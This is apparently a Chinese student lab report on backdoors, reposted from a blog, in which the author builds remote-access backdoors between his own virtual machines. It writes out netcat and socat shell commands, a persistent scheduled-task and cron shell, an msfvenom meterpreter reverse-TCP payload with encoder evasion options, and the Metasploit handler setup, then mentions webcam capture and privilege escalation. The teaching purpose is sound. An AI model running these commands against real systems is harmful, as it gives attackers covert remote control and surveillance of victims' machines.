目录
1.系统或软件在编写最初时程序员人为留下的特殊通道
2.系统或软件在编写时由于程序本身的原因产生的漏洞而被不法分子利用产生的后门
3.不法分子利用自制木马或其他攻击程序植入正常用户的主机产生的后门
随意点击网页链接浏览未知内容的网页
随意在网上下载未经认证的软件
使用游戏外挂
Windows中启动应用程序时被启动
Linux中后台输入命令启动
可以在一个正常的可执行文件中添加反弹链接的代码,使得它成为一个后门
通过该软件可以调取被入侵主机的摄像头和音频输入设备,实现实时拍照,摄像和录音的功能,还能监听被入侵主机的键盘输入,获取其当前输入的内容,这就让我们想到盗取用户密码等...可怕的事情
1.通过杀毒软件的防护和扫描功能
2.不定时的检查电脑当前运行中的各种程序,发现异常进程因立即关闭
kali中是自带netcat软件的所以我们不需要下载就可以正常使用。而Windows系统中是没有该程序的,需要先下载才可以进行我们的实验。注:由于控制需要通过网络,所以要首先保证攻击方主机和被攻击者主机网络是可连通的,由于实验是用虚拟机与物理机相互攻击,且两者使用同一网络,所以不存在该问题。
获取IP地址,Windows系统输入ipconfig,Linux系统输入ifconfig
nc -l -p 2329在Windows系统中进入netcat程序所在文件夹,打开命令行输入
ncat 172.16.2.34 2329 -e cmd.exe注:netcat中参数
-l 代表开启监听
-p 指定端口
-e 发送一个指定应用程序
-e /bin/sh而不是cmd.exesocat拥有的功能与netcat并没有什么区别,这部分主要是使用Windows的任务计划的功能让其在某个特定时段自动开启连接
控制面板-->搜索“管理工具”-->任务计划 并进入
socat.exe在可选参数中填入tcp-listen:2329 exec:cmd.exe,pty,stderr
使用快捷键Win+L快速注销用户再重新登录,可以发现程序已经启动了
kali中输入socat - tcp:172.16.2.65 2329就可以连接到任务Windows主机了
同样也可以在Linux上设置计划任务,用Windows去连接,Linux命令格式如下:
* * * * * socat tcp-listen:[PORT] exec:/bin/sh,pty,stderr
//分 时 日 月 年 命令 参数:端口号 发送程序,类型
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.34 `PORT=2329 -f exe > 20162329_backdoor.exe-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
-e 使用的编码器,用于对shellcode变形,为了免杀。
-i 编码器的迭代次数。如上即使用该编码器编码5次。
-b badchar是payload中需要去除的字符。
LHOST 是反弹回连的IP
LPORT 是回连的端口
-f 生成文件的类型
> 输出到哪个文件
ncat命令实现文件的传输
可以看到我们做好的后门已经传输到了Windows系统上,然后运行我们这个程序结果什么事情都没有发生,但其实后门已经打开了,接下来就是实现后门的连接和做一些 骚操作
Linux系统上打开对后门程序的连接监听msfconsole进入MSF控制台,如图还给我们画出了一个小忍者(黑客):use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.2.34
set LPORT 2329
exploit
help一下
发现我们有好多事情可以做,比如调用对方的摄像头,拍个照
提个权吧
通过本次实验切实的了解了什么是后门,并且通过一系列操作在一定条件下我们也自己实现了后门的制作和渗透入侵,这也让我意识到了网络安全的重要性,然后想了想以前自己在网上随便下载软件和打开网页,真是让我感到细思极恐。实验既有趣又有用,我觉得以后我一定会更注意网络安全防护!!
2018-2019-2 网络对抗技术 20162329 Exp2 后门原理与实践
原文:https://www.cnblogs.com/Zhangxusheng/p/10584493.html